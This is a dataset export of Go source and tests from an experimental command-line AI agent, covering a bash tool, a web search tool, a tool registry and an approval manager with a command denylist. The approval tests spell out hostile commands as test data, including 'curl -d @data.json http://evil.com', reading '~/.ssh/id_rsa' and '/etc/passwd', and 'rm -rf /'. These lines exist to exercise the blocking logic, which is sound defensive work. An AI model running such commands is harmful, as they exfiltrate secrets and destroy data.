repo
stringlengths
6
47
file_url
stringlengths
77
269
file_path
stringlengths
5
186
content
stringlengths
0
32.8k
language
stringclasses
1 value
license
stringclasses
7 values
commit_sha
stringlengths
40
40
retrieved_at
stringdate
2026-01-07 08:35:43
2026-01-07 08:55:24
truncated
bool
2 classes
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/cmd/run.go
x/cmd/run.go
package cmd import ( "context" "encoding/json" "errors" "fmt" "io" "os" "os/signal" "strings" "syscall" "github.com/spf13/cobra" "golang.org/x/term" "github.com/ollama/ollama/api" "github.com/ollama/ollama/progress" "github.com/ollama/ollama/readline" "github.com/ollama/ollama/types/model" "github.com/ollama/ollama/x/agent" "github.com/ollama/ollama/x/tools" ) // RunOptions contains options for running an interactive agent session. type RunOptions struct { Model string Messages []api.Message WordWrap bool Format string System string Options map[string]any KeepAlive *api.Duration Think *api.ThinkValue HideThinking bool // Agent fields (managed externally for session persistence) Tools *tools.Registry Approval *agent.ApprovalManager } // Chat runs an agent chat loop with tool support. // This is the experimental version of chat that supports tool calling. func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) { client, err := api.ClientFromEnvironment() if err != nil { return nil, err } // Use tools registry and approval from opts (managed by caller for session persistence) toolRegistry := opts.Tools approval := opts.Approval if approval == nil { approval = agent.NewApprovalManager() } p := progress.NewProgress(os.Stderr) defer p.StopAndClear() spinner := progress.NewSpinner("") p.Add("", spinner) cancelCtx, cancel := context.WithCancel(ctx) defer cancel() sigChan := make(chan os.Signal, 1) signal.Notify(sigChan, syscall.SIGINT) go func() { <-sigChan cancel() }() var state *displayResponseState = &displayResponseState{} var thinkingContent strings.Builder var fullResponse strings.Builder var thinkTagOpened bool = false var thinkTagClosed bool = false var pendingToolCalls []api.ToolCall role := "assistant" messages := opts.Messages fn := func(response api.ChatResponse) error { if response.Message.Content != "" || !opts.HideThinking { p.StopAndClear() } role = response.Message.Role if response.Message.Thinking != "" && !opts.HideThinking { if !thinkTagOpened { fmt.Print(thinkingOutputOpeningText(false)) thinkTagOpened = true thinkTagClosed = false } thinkingContent.WriteString(response.Message.Thinking) displayResponse(response.Message.Thinking, opts.WordWrap, state) } content := response.Message.Content if thinkTagOpened && !thinkTagClosed && (content != "" || len(response.Message.ToolCalls) > 0) { if !strings.HasSuffix(thinkingContent.String(), "\n") { fmt.Println() } fmt.Print(thinkingOutputClosingText(false)) thinkTagOpened = false thinkTagClosed = true state = &displayResponseState{} } fullResponse.WriteString(content) if response.Message.ToolCalls != nil { toolCalls := response.Message.ToolCalls if len(toolCalls) > 0 { if toolRegistry != nil { // Store tool calls for execution after response is complete pendingToolCalls = append(pendingToolCalls, toolCalls...) } else { // No tools registry, just display tool calls fmt.Print(renderToolCalls(toolCalls, false)) } } } displayResponse(content, opts.WordWrap, state) return nil } if opts.Format == "json" { opts.Format = `"` + opts.Format + `"` } // Agentic loop: continue until no more tool calls for { req := &api.ChatRequest{ Model: opts.Model, Messages: messages, Format: json.RawMessage(opts.Format), Options: opts.Options, Think: opts.Think, } // Add tools if toolRegistry != nil { apiTools := toolRegistry.Tools() if len(apiTools) > 0 { req.Tools = apiTools } } if opts.KeepAlive != nil { req.KeepAlive = opts.KeepAlive } if err := client.Chat(cancelCtx, req, fn); err != nil { if errors.Is(err, context.Canceled) { return nil, nil } if strings.Contains(err.Error(), "upstream error") { p.StopAndClear() fmt.Println("An error occurred while processing your message. Please try again.") fmt.Println() return nil, nil } return nil, err } // If no tool calls, we're done if len(pendingToolCalls) == 0 || toolRegistry == nil { break } // Execute tool calls and continue the conversation fmt.Fprintf(os.Stderr, "\n") // Add assistant's tool call message to history assistantMsg := api.Message{ Role: "assistant", Content: fullResponse.String(), Thinking: thinkingContent.String(), ToolCalls: pendingToolCalls, } messages = append(messages, assistantMsg) // Execute each tool call and collect results var toolResults []api.Message for _, call := range pendingToolCalls { toolName := call.Function.Name args := call.Function.Arguments.ToMap() // For bash commands, check denylist first skipApproval := false if toolName == "bash" { if cmd, ok := args["command"].(string); ok { // Check if command is denied (dangerous pattern) if denied, pattern := agent.IsDenied(cmd); denied { fmt.Fprintf(os.Stderr, "\033[91m✗ Blocked: %s\033[0m\n", formatToolShort(toolName, args)) fmt.Fprintf(os.Stderr, "\033[91m Matches dangerous pattern: %s\033[0m\n", pattern) toolResults = append(toolResults, api.Message{ Role: "tool", Content: agent.FormatDeniedResult(cmd, pattern), ToolCallID: call.ID, }) continue } // Check if command is auto-allowed (safe command) if agent.IsAutoAllowed(cmd) { fmt.Fprintf(os.Stderr, "\033[90m▶ Auto-allowed: %s\033[0m\n", formatToolShort(toolName, args)) skipApproval = true } } } // Check approval (uses prefix matching for bash commands) if !skipApproval && !approval.IsAllowed(toolName, args) { result, err := approval.RequestApproval(toolName, args) if err != nil { fmt.Fprintf(os.Stderr, "Error requesting approval: %v\n", err) toolResults = append(toolResults, api.Message{ Role: "tool", Content: fmt.Sprintf("Error: %v", err), ToolCallID: call.ID, }) continue } // Show collapsed result fmt.Fprintln(os.Stderr, agent.FormatApprovalResult(toolName, args, result)) switch result.Decision { case agent.ApprovalDeny: toolResults = append(toolResults, api.Message{ Role: "tool", Content: agent.FormatDenyResult(toolName, result.DenyReason), ToolCallID: call.ID, }) continue case agent.ApprovalAlways: approval.AddToAllowlist(toolName, args) } } else if !skipApproval { // Already allowed - show running indicator fmt.Fprintf(os.Stderr, "\033[90m▶ Running: %s\033[0m\n", formatToolShort(toolName, args)) } // Execute the tool toolResult, err := toolRegistry.Execute(call) if err != nil { fmt.Fprintf(os.Stderr, "\033[31m Error: %v\033[0m\n", err) toolResults = append(toolResults, api.Message{ Role: "tool", Content: fmt.Sprintf("Error: %v", err), ToolCallID: call.ID, }) continue } // Display tool output (truncated for display) if toolResult != "" { output := toolResult if len(output) > 300 { output = output[:300] + "... (truncated)" } // Show result in grey, indented fmt.Fprintf(os.Stderr, "\033[90m %s\033[0m\n", strings.ReplaceAll(output, "\n", "\n ")) } toolResults = append(toolResults, api.Message{ Role: "tool", Content: toolResult, ToolCallID: call.ID, }) } // Add tool results to message history messages = append(messages, toolResults...) fmt.Fprintf(os.Stderr, "\n") // Reset state for next iteration fullResponse.Reset() thinkingContent.Reset() thinkTagOpened = false thinkTagClosed = false pendingToolCalls = nil state = &displayResponseState{} // Start new progress spinner for next API call p = progress.NewProgress(os.Stderr) spinner = progress.NewSpinner("") p.Add("", spinner) } if len(opts.Messages) > 0 { fmt.Println() fmt.Println() } return &api.Message{Role: role, Thinking: thinkingContent.String(), Content: fullResponse.String()}, nil } // truncateUTF8 safely truncates a string to at most limit runes, adding "..." if truncated. func truncateUTF8(s string, limit int) string { runes := []rune(s) if len(runes) <= limit { return s } if limit <= 3 { return string(runes[:limit]) } return string(runes[:limit-3]) + "..." } // formatToolShort returns a short description of a tool call. func formatToolShort(toolName string, args map[string]any) string { if toolName == "bash" { if cmd, ok := args["command"].(string); ok { return fmt.Sprintf("bash: %s", truncateUTF8(cmd, 50)) } } if toolName == "web_search" { if query, ok := args["query"].(string); ok { return fmt.Sprintf("web_search: %s", truncateUTF8(query, 50)) } } return toolName } // Helper types and functions for display type displayResponseState struct { lineLength int wordBuffer string } func displayResponse(content string, wordWrap bool, state *displayResponseState) { termWidth, _, _ := term.GetSize(int(os.Stdout.Fd())) if wordWrap && termWidth >= 10 { for _, ch := range content { if state.lineLength+1 > termWidth-5 { if len(state.wordBuffer) > termWidth-10 { fmt.Printf("%s%c", state.wordBuffer, ch) state.wordBuffer = "" state.lineLength = 0 continue } // backtrack the length of the last word and clear to the end of the line a := len(state.wordBuffer) if a > 0 { fmt.Printf("\x1b[%dD", a) } fmt.Printf("\x1b[K\n") fmt.Printf("%s%c", state.wordBuffer, ch) state.lineLength = len(state.wordBuffer) + 1 } else { fmt.Print(string(ch)) state.lineLength++ switch ch { case ' ', '\t': state.wordBuffer = "" case '\n', '\r': state.lineLength = 0 state.wordBuffer = "" default: state.wordBuffer += string(ch) } } } } else { fmt.Printf("%s%s", state.wordBuffer, content) if len(state.wordBuffer) > 0 { state.wordBuffer = "" } } } func thinkingOutputOpeningText(plainText bool) string { text := "Thinking...\n" if plainText { return text } return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault + readline.ColorGrey } func thinkingOutputClosingText(plainText bool) string { text := "...done thinking.\n\n" if plainText { return text } return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault } func renderToolCalls(toolCalls []api.ToolCall, plainText bool) string { out := "" formatExplanation := "" formatValues := "" if !plainText { formatExplanation = readline.ColorGrey + readline.ColorBold formatValues = readline.ColorDefault out += formatExplanation } for i, toolCall := range toolCalls { argsAsJSON, err := json.Marshal(toolCall.Function.Arguments) if err != nil { return "" } if i > 0 { out += "\n" } out += fmt.Sprintf(" Tool call: %s(%s)", formatValues+toolCall.Function.Name+formatExplanation, formatValues+string(argsAsJSON)+formatExplanation) } if !plainText { out += readline.ColorDefault } return out } // checkModelCapabilities checks if the model supports tools. func checkModelCapabilities(ctx context.Context, modelName string) (supportsTools bool, err error) { client, err := api.ClientFromEnvironment() if err != nil { return false, err } resp, err := client.Show(ctx, &api.ShowRequest{Model: modelName}) if err != nil { return false, err } for _, cap := range resp.Capabilities { if cap == model.CapabilityTools { return true, nil } } return false, nil } // GenerateInteractive runs an interactive agent session. // This is called from cmd.go when --experimental flag is set. func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration) error { scanner, err := readline.New(readline.Prompt{ Prompt: ">>> ", AltPrompt: "... ", Placeholder: "Send a message (/? for help)", AltPlaceholder: `Use """ to end multi-line input`, }) if err != nil { return err } fmt.Print(readline.StartBracketedPaste) defer fmt.Printf(readline.EndBracketedPaste) // Check if model supports tools supportsTools, err := checkModelCapabilities(cmd.Context(), modelName) if err != nil { fmt.Fprintf(os.Stderr, "\033[33mWarning: Could not check model capabilities: %v\033[0m\n", err) supportsTools = false } // Create tool registry only if model supports tools var toolRegistry *tools.Registry if supportsTools { toolRegistry = tools.DefaultRegistry() fmt.Fprintf(os.Stderr, "Tools available: %s\n", strings.Join(toolRegistry.Names(), ", ")) // Check for OLLAMA_API_KEY for web search if os.Getenv("OLLAMA_API_KEY") == "" { fmt.Fprintf(os.Stderr, "\033[33mWarning: OLLAMA_API_KEY not set - web search will not work\033[0m\n") } } else { fmt.Fprintf(os.Stderr, "\033[33mNote: Model does not support tools - running in chat-only mode\033[0m\n") } // Create approval manager for session approval := agent.NewApprovalManager() var messages []api.Message var sb strings.Builder for { line, err := scanner.Readline() switch { case errors.Is(err, io.EOF): fmt.Println() return nil case errors.Is(err, readline.ErrInterrupt): if line == "" { fmt.Println("\nUse Ctrl + d or /bye to exit.") } sb.Reset() continue case err != nil: return err } switch { case strings.HasPrefix(line, "/exit"), strings.HasPrefix(line, "/bye"): return nil case strings.HasPrefix(line, "/clear"): messages = []api.Message{} approval.Reset() fmt.Println("Cleared session context and tool approvals") continue case strings.HasPrefix(line, "/tools"): showToolsStatus(toolRegistry, approval, supportsTools) continue case strings.HasPrefix(line, "/help"), strings.HasPrefix(line, "/?"): fmt.Fprintln(os.Stderr, "Available Commands:") fmt.Fprintln(os.Stderr, " /tools Show available tools and approvals") fmt.Fprintln(os.Stderr, " /clear Clear session context and approvals") fmt.Fprintln(os.Stderr, " /bye Exit") fmt.Fprintln(os.Stderr, " /?, /help Help for a command") fmt.Fprintln(os.Stderr, "") continue case strings.HasPrefix(line, "/"): fmt.Printf("Unknown command '%s'. Type /? for help\n", strings.Fields(line)[0]) continue default: sb.WriteString(line) } if sb.Len() > 0 { newMessage := api.Message{Role: "user", Content: sb.String()} messages = append(messages, newMessage) opts := RunOptions{ Model: modelName, Messages: messages, WordWrap: wordWrap, Options: options, Think: think, HideThinking: hideThinking, KeepAlive: keepAlive, Tools: toolRegistry, Approval: approval, } assistant, err := Chat(cmd.Context(), opts) if err != nil { return err } if assistant != nil { messages = append(messages, *assistant) } sb.Reset() } } } // showToolsStatus displays the current tools and approval status. func showToolsStatus(registry *tools.Registry, approval *agent.ApprovalManager, supportsTools bool) { if !supportsTools || registry == nil { fmt.Println("Tools not available - model does not support tool calling") fmt.Println() return } fmt.Println("Available tools:") for _, name := range registry.Names() { tool, _ := registry.Get(name) fmt.Printf(" %s - %s\n", name, tool.Description()) } allowed := approval.AllowedTools() if len(allowed) > 0 { fmt.Println("\nSession approvals:") for _, key := range allowed { fmt.Printf(" %s\n", key) } } else { fmt.Println("\nNo tools approved for this session yet") } fmt.Println() }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/tools/websearch.go
x/tools/websearch.go
package tools import ( "bytes" "encoding/json" "fmt" "io" "net/http" "os" "strings" "time" "github.com/ollama/ollama/api" ) const ( webSearchAPI = "https://ollama.com/api/web_search" webSearchTimeout = 15 * time.Second ) // WebSearchTool implements web search using Ollama's hosted API. type WebSearchTool struct{} // Name returns the tool name. func (w *WebSearchTool) Name() string { return "web_search" } // Description returns a description of the tool. func (w *WebSearchTool) Description() string { return "Search the web for current information. Use this when you need up-to-date information that may not be in your training data." } // Schema returns the tool's parameter schema. func (w *WebSearchTool) Schema() api.ToolFunction { props := api.NewToolPropertiesMap() props.Set("query", api.ToolProperty{ Type: api.PropertyType{"string"}, Description: "The search query to look up on the web", }) return api.ToolFunction{ Name: w.Name(), Description: w.Description(), Parameters: api.ToolFunctionParameters{ Type: "object", Properties: props, Required: []string{"query"}, }, } } // webSearchRequest is the request body for the web search API. type webSearchRequest struct { Query string `json:"query"` MaxResults int `json:"max_results,omitempty"` } // webSearchResponse is the response from the web search API. type webSearchResponse struct { Results []webSearchResult `json:"results"` } // webSearchResult is a single search result. type webSearchResult struct { Title string `json:"title"` URL string `json:"url"` Content string `json:"content"` } // Execute performs the web search. func (w *WebSearchTool) Execute(args map[string]any) (string, error) { query, ok := args["query"].(string) if !ok || query == "" { return "", fmt.Errorf("query parameter is required") } apiKey := os.Getenv("OLLAMA_API_KEY") if apiKey == "" { return "", fmt.Errorf("OLLAMA_API_KEY environment variable is required for web search") } // Prepare request reqBody := webSearchRequest{ Query: query, MaxResults: 5, } jsonBody, err := json.Marshal(reqBody) if err != nil { return "", fmt.Errorf("marshaling request: %w", err) } req, err := http.NewRequest("POST", webSearchAPI, bytes.NewBuffer(jsonBody)) if err != nil { return "", fmt.Errorf("creating request: %w", err) } req.Header.Set("Content-Type", "application/json") req.Header.Set("Authorization", "Bearer "+apiKey) // Send request client := &http.Client{Timeout: webSearchTimeout} resp, err := client.Do(req) if err != nil { return "", fmt.Errorf("sending request: %w", err) } defer resp.Body.Close() body, err := io.ReadAll(resp.Body) if err != nil { return "", fmt.Errorf("reading response: %w", err) } if resp.StatusCode != http.StatusOK { return "", fmt.Errorf("web search API returned status %d: %s", resp.StatusCode, string(body)) } // Parse response var searchResp webSearchResponse if err := json.Unmarshal(body, &searchResp); err != nil { return "", fmt.Errorf("parsing response: %w", err) } // Format results if len(searchResp.Results) == 0 { return "No results found for query: " + query, nil } var sb strings.Builder sb.WriteString(fmt.Sprintf("Search results for: %s\n\n", query)) for i, result := range searchResp.Results { sb.WriteString(fmt.Sprintf("%d. %s\n", i+1, result.Title)) sb.WriteString(fmt.Sprintf(" URL: %s\n", result.URL)) if result.Content != "" { // Truncate long content (UTF-8 safe) content := result.Content runes := []rune(content) if len(runes) > 300 { content = string(runes[:300]) + "..." } sb.WriteString(fmt.Sprintf(" %s\n", content)) } sb.WriteString("\n") } return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/tools/bash.go
x/tools/bash.go
package tools import ( "bytes" "context" "fmt" "os/exec" "strings" "time" "github.com/ollama/ollama/api" ) const ( // bashTimeout is the maximum execution time for a command. bashTimeout = 60 * time.Second // maxOutputSize is the maximum output size in bytes. maxOutputSize = 50000 ) // BashTool implements shell command execution. type BashTool struct{} // Name returns the tool name. func (b *BashTool) Name() string { return "bash" } // Description returns a description of the tool. func (b *BashTool) Description() string { return "Execute a bash command on the system. Use this to run shell commands, check files, run programs, etc." } // Schema returns the tool's parameter schema. func (b *BashTool) Schema() api.ToolFunction { props := api.NewToolPropertiesMap() props.Set("command", api.ToolProperty{ Type: api.PropertyType{"string"}, Description: "The bash command to execute", }) return api.ToolFunction{ Name: b.Name(), Description: b.Description(), Parameters: api.ToolFunctionParameters{ Type: "object", Properties: props, Required: []string{"command"}, }, } } // Execute runs the bash command. func (b *BashTool) Execute(args map[string]any) (string, error) { command, ok := args["command"].(string) if !ok || command == "" { return "", fmt.Errorf("command parameter is required") } // Create context with timeout ctx, cancel := context.WithTimeout(context.Background(), bashTimeout) defer cancel() // Execute command cmd := exec.CommandContext(ctx, "bash", "-c", command) var stdout, stderr bytes.Buffer cmd.Stdout = &stdout cmd.Stderr = &stderr err := cmd.Run() // Build output var sb strings.Builder // Add stdout if stdout.Len() > 0 { output := stdout.String() if len(output) > maxOutputSize { output = output[:maxOutputSize] + "\n... (output truncated)" } sb.WriteString(output) } // Add stderr if present if stderr.Len() > 0 { stderrOutput := stderr.String() if len(stderrOutput) > maxOutputSize { stderrOutput = stderrOutput[:maxOutputSize] + "\n... (stderr truncated)" } if sb.Len() > 0 { sb.WriteString("\n") } sb.WriteString("stderr:\n") sb.WriteString(stderrOutput) } // Handle errors if err != nil { if ctx.Err() == context.DeadlineExceeded { return sb.String() + "\n\nError: command timed out after 60 seconds", nil } // Include exit code in output but don't return as error if exitErr, ok := err.(*exec.ExitError); ok { return sb.String() + fmt.Sprintf("\n\nExit code: %d", exitErr.ExitCode()), nil } return sb.String(), fmt.Errorf("executing command: %w", err) } if sb.Len() == 0 { return "(no output)", nil } return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/tools/registry.go
x/tools/registry.go
// Package tools provides built-in tool implementations for the agent loop. package tools import ( "fmt" "sort" "github.com/ollama/ollama/api" ) // Tool defines the interface for agent tools. type Tool interface { // Name returns the tool's unique identifier. Name() string // Description returns a human-readable description of what the tool does. Description() string // Schema returns the tool's parameter schema for the LLM. Schema() api.ToolFunction // Execute runs the tool with the given arguments. Execute(args map[string]any) (string, error) } // Registry manages available tools. type Registry struct { tools map[string]Tool } // NewRegistry creates a new tool registry. func NewRegistry() *Registry { return &Registry{ tools: make(map[string]Tool), } } // Register adds a tool to the registry. func (r *Registry) Register(tool Tool) { r.tools[tool.Name()] = tool } // Get retrieves a tool by name. func (r *Registry) Get(name string) (Tool, bool) { tool, ok := r.tools[name] return tool, ok } // Tools returns all registered tools in Ollama API format, sorted by name. func (r *Registry) Tools() api.Tools { // Get sorted names for deterministic ordering names := make([]string, 0, len(r.tools)) for name := range r.tools { names = append(names, name) } sort.Strings(names) var tools api.Tools for _, name := range names { tool := r.tools[name] tools = append(tools, api.Tool{ Type: "function", Function: tool.Schema(), }) } return tools } // Execute runs a tool call and returns the result. func (r *Registry) Execute(call api.ToolCall) (string, error) { tool, ok := r.tools[call.Function.Name] if !ok { return "", fmt.Errorf("unknown tool: %s", call.Function.Name) } return tool.Execute(call.Function.Arguments.ToMap()) } // Names returns the names of all registered tools, sorted alphabetically. func (r *Registry) Names() []string { names := make([]string, 0, len(r.tools)) for name := range r.tools { names = append(names, name) } sort.Strings(names) return names } // Count returns the number of registered tools. func (r *Registry) Count() int { return len(r.tools) } // DefaultRegistry creates a registry with all built-in tools. func DefaultRegistry() *Registry { r := NewRegistry() r.Register(&WebSearchTool{}) r.Register(&BashTool{}) return r }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/tools/registry_test.go
x/tools/registry_test.go
package tools import ( "testing" "github.com/ollama/ollama/api" ) func TestRegistry_Register(t *testing.T) { r := NewRegistry() r.Register(&BashTool{}) r.Register(&WebSearchTool{}) if r.Count() != 2 { t.Errorf("expected 2 tools, got %d", r.Count()) } names := r.Names() if len(names) != 2 { t.Errorf("expected 2 names, got %d", len(names)) } } func TestRegistry_Get(t *testing.T) { r := NewRegistry() r.Register(&BashTool{}) tool, ok := r.Get("bash") if !ok { t.Fatal("expected to find bash tool") } if tool.Name() != "bash" { t.Errorf("expected name 'bash', got '%s'", tool.Name()) } _, ok = r.Get("nonexistent") if ok { t.Error("expected not to find nonexistent tool") } } func TestRegistry_Tools(t *testing.T) { r := NewRegistry() r.Register(&BashTool{}) r.Register(&WebSearchTool{}) tools := r.Tools() if len(tools) != 2 { t.Errorf("expected 2 tools, got %d", len(tools)) } for _, tool := range tools { if tool.Type != "function" { t.Errorf("expected type 'function', got '%s'", tool.Type) } } } func TestRegistry_Execute(t *testing.T) { r := NewRegistry() r.Register(&BashTool{}) // Test successful execution args := api.NewToolCallFunctionArguments() args.Set("command", "echo hello") result, err := r.Execute(api.ToolCall{ Function: api.ToolCallFunction{ Name: "bash", Arguments: args, }, }) if err != nil { t.Fatalf("unexpected error: %v", err) } if result != "hello\n" { t.Errorf("expected 'hello\\n', got '%s'", result) } // Test unknown tool _, err = r.Execute(api.ToolCall{ Function: api.ToolCallFunction{ Name: "unknown", Arguments: api.NewToolCallFunctionArguments(), }, }) if err == nil { t.Error("expected error for unknown tool") } } func TestDefaultRegistry(t *testing.T) { r := DefaultRegistry() if r.Count() != 2 { t.Errorf("expected 2 tools in default registry, got %d", r.Count()) } _, ok := r.Get("bash") if !ok { t.Error("expected bash tool in default registry") } _, ok = r.Get("web_search") if !ok { t.Error("expected web_search tool in default registry") } } func TestBashTool_Schema(t *testing.T) { tool := &BashTool{} schema := tool.Schema() if schema.Name != "bash" { t.Errorf("expected name 'bash', got '%s'", schema.Name) } if schema.Parameters.Type != "object" { t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type) } if _, ok := schema.Parameters.Properties.Get("command"); !ok { t.Error("expected 'command' property in schema") } } func TestWebSearchTool_Schema(t *testing.T) { tool := &WebSearchTool{} schema := tool.Schema() if schema.Name != "web_search" { t.Errorf("expected name 'web_search', got '%s'", schema.Name) } if schema.Parameters.Type != "object" { t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type) } if _, ok := schema.Parameters.Properties.Get("query"); !ok { t.Error("expected 'query' property in schema") } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/agent/approval_test.go
x/agent/approval_test.go
package agent import ( "strings" "testing" ) func TestApprovalManager_IsAllowed(t *testing.T) { am := NewApprovalManager() // Initially nothing is allowed if am.IsAllowed("test_tool", nil) { t.Error("expected test_tool to not be allowed initially") } // Add to allowlist am.AddToAllowlist("test_tool", nil) // Now it should be allowed if !am.IsAllowed("test_tool", nil) { t.Error("expected test_tool to be allowed after AddToAllowlist") } // Other tools should still not be allowed if am.IsAllowed("other_tool", nil) { t.Error("expected other_tool to not be allowed") } } func TestApprovalManager_Reset(t *testing.T) { am := NewApprovalManager() am.AddToAllowlist("tool1", nil) am.AddToAllowlist("tool2", nil) if !am.IsAllowed("tool1", nil) || !am.IsAllowed("tool2", nil) { t.Error("expected tools to be allowed") } am.Reset() if am.IsAllowed("tool1", nil) || am.IsAllowed("tool2", nil) { t.Error("expected tools to not be allowed after Reset") } } func TestApprovalManager_AllowedTools(t *testing.T) { am := NewApprovalManager() tools := am.AllowedTools() if len(tools) != 0 { t.Errorf("expected 0 allowed tools, got %d", len(tools)) } am.AddToAllowlist("tool1", nil) am.AddToAllowlist("tool2", nil) tools = am.AllowedTools() if len(tools) != 2 { t.Errorf("expected 2 allowed tools, got %d", len(tools)) } } func TestAllowlistKey(t *testing.T) { tests := []struct { name string toolName string args map[string]any expected string }{ { name: "web_search tool", toolName: "web_search", args: map[string]any{"query": "test"}, expected: "web_search", }, { name: "bash tool with command", toolName: "bash", args: map[string]any{"command": "ls -la"}, expected: "bash:ls -la", }, { name: "bash tool without command", toolName: "bash", args: map[string]any{}, expected: "bash", }, { name: "other tool", toolName: "custom_tool", args: map[string]any{"param": "value"}, expected: "custom_tool", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { result := AllowlistKey(tt.toolName, tt.args) if result != tt.expected { t.Errorf("AllowlistKey(%s, %v) = %s, expected %s", tt.toolName, tt.args, result, tt.expected) } }) } } func TestExtractBashPrefix(t *testing.T) { tests := []struct { name string command string expected string }{ { name: "cat with path", command: "cat tools/tools_test.go", expected: "cat:tools/", }, { name: "cat with pipe", command: "cat tools/tools_test.go | head -200", expected: "cat:tools/", }, { name: "ls with path", command: "ls -la src/components", expected: "ls:src/", }, { name: "grep with directory path", command: "grep -r pattern api/handlers/", expected: "grep:api/handlers/", }, { name: "cat in current dir", command: "cat file.txt", expected: "cat:./", }, { name: "unsafe command", command: "rm -rf /", expected: "", }, { name: "no path arg", command: "ls -la", expected: "", }, { name: "head with flags only", command: "head -n 100", expected: "", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { result := extractBashPrefix(tt.command) if result != tt.expected { t.Errorf("extractBashPrefix(%q) = %q, expected %q", tt.command, result, tt.expected) } }) } } func TestApprovalManager_PrefixAllowlist(t *testing.T) { am := NewApprovalManager() // Allow "cat tools/file.go" am.AddToAllowlist("bash", map[string]any{"command": "cat tools/file.go"}) // Should allow other files in same directory if !am.IsAllowed("bash", map[string]any{"command": "cat tools/other.go"}) { t.Error("expected cat tools/other.go to be allowed via prefix") } // Should not allow different directory if am.IsAllowed("bash", map[string]any{"command": "cat src/main.go"}) { t.Error("expected cat src/main.go to NOT be allowed") } // Should not allow different command in same directory if am.IsAllowed("bash", map[string]any{"command": "rm tools/file.go"}) { t.Error("expected rm tools/file.go to NOT be allowed (rm is not a safe command)") } } func TestFormatApprovalResult(t *testing.T) { tests := []struct { name string toolName string args map[string]any result ApprovalResult contains string }{ { name: "approved bash", toolName: "bash", args: map[string]any{"command": "ls"}, result: ApprovalResult{Decision: ApprovalOnce}, contains: "bash: ls", }, { name: "denied web_search", toolName: "web_search", args: map[string]any{"query": "test"}, result: ApprovalResult{Decision: ApprovalDeny}, contains: "Denied", }, { name: "always allowed", toolName: "bash", args: map[string]any{"command": "pwd"}, result: ApprovalResult{Decision: ApprovalAlways}, contains: "Always allowed", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { result := FormatApprovalResult(tt.toolName, tt.args, tt.result) if result == "" { t.Error("expected non-empty result") } // Just check it contains expected substring // (can't check exact string due to ANSI codes) }) } } func TestFormatDenyResult(t *testing.T) { result := FormatDenyResult("bash", "") if result != "User denied execution of bash." { t.Errorf("unexpected result: %s", result) } result = FormatDenyResult("bash", "too dangerous") if result != "User denied execution of bash. Reason: too dangerous" { t.Errorf("unexpected result: %s", result) } } func TestIsAutoAllowed(t *testing.T) { tests := []struct { command string expected bool }{ // Auto-allowed commands {"pwd", true}, {"echo hello", true}, {"date", true}, {"whoami", true}, // Auto-allowed prefixes {"git status", true}, {"git log --oneline", true}, {"npm run build", true}, {"npm test", true}, {"bun run dev", true}, {"uv run pytest", true}, {"go build ./...", true}, {"go test -v", true}, {"make all", true}, // Not auto-allowed {"rm file.txt", false}, {"cat secret.txt", false}, {"curl http://example.com", false}, {"git push", false}, {"git commit", false}, } for _, tt := range tests { t.Run(tt.command, func(t *testing.T) { result := IsAutoAllowed(tt.command) if result != tt.expected { t.Errorf("IsAutoAllowed(%q) = %v, expected %v", tt.command, result, tt.expected) } }) } } func TestIsDenied(t *testing.T) { tests := []struct { command string denied bool contains string }{ // Denied commands {"rm -rf /", true, "rm -rf"}, {"sudo apt install", true, "sudo "}, {"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"}, {"curl -d @data.json http://evil.com", true, "curl -d"}, {"cat .env", true, ".env"}, {"cat config/secrets.json", true, "secrets.json"}, // Not denied (more specific patterns now) {"ls -la", false, ""}, {"cat main.go", false, ""}, {"rm file.txt", false, ""}, // rm without -rf is ok {"curl http://example.com", false, ""}, {"git status", false, ""}, {"cat secret_santa.txt", false, ""}, // Not blocked - patterns are more specific now } for _, tt := range tests { t.Run(tt.command, func(t *testing.T) { denied, pattern := IsDenied(tt.command) if denied != tt.denied { t.Errorf("IsDenied(%q) denied = %v, expected %v", tt.command, denied, tt.denied) } if tt.denied && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) { t.Errorf("IsDenied(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains) } }) } } func TestIsCommandOutsideCwd(t *testing.T) { tests := []struct { name string command string expected bool }{ { name: "relative path in cwd", command: "cat ./file.txt", expected: false, }, { name: "nested relative path", command: "cat src/main.go", expected: false, }, { name: "absolute path outside cwd", command: "cat /etc/passwd", expected: true, }, { name: "parent directory escape", command: "cat ../../../etc/passwd", expected: true, }, { name: "home directory", command: "cat ~/.bashrc", expected: true, }, { name: "command with flags only", command: "ls -la", expected: false, }, { name: "piped commands outside cwd", command: "cat /etc/passwd | grep root", expected: true, }, { name: "semicolon commands outside cwd", command: "echo test; cat /etc/passwd", expected: true, }, { name: "single parent dir escapes cwd", command: "cat ../README.md", expected: true, // Parent directory is outside cwd }, } for _, tt := range tests { 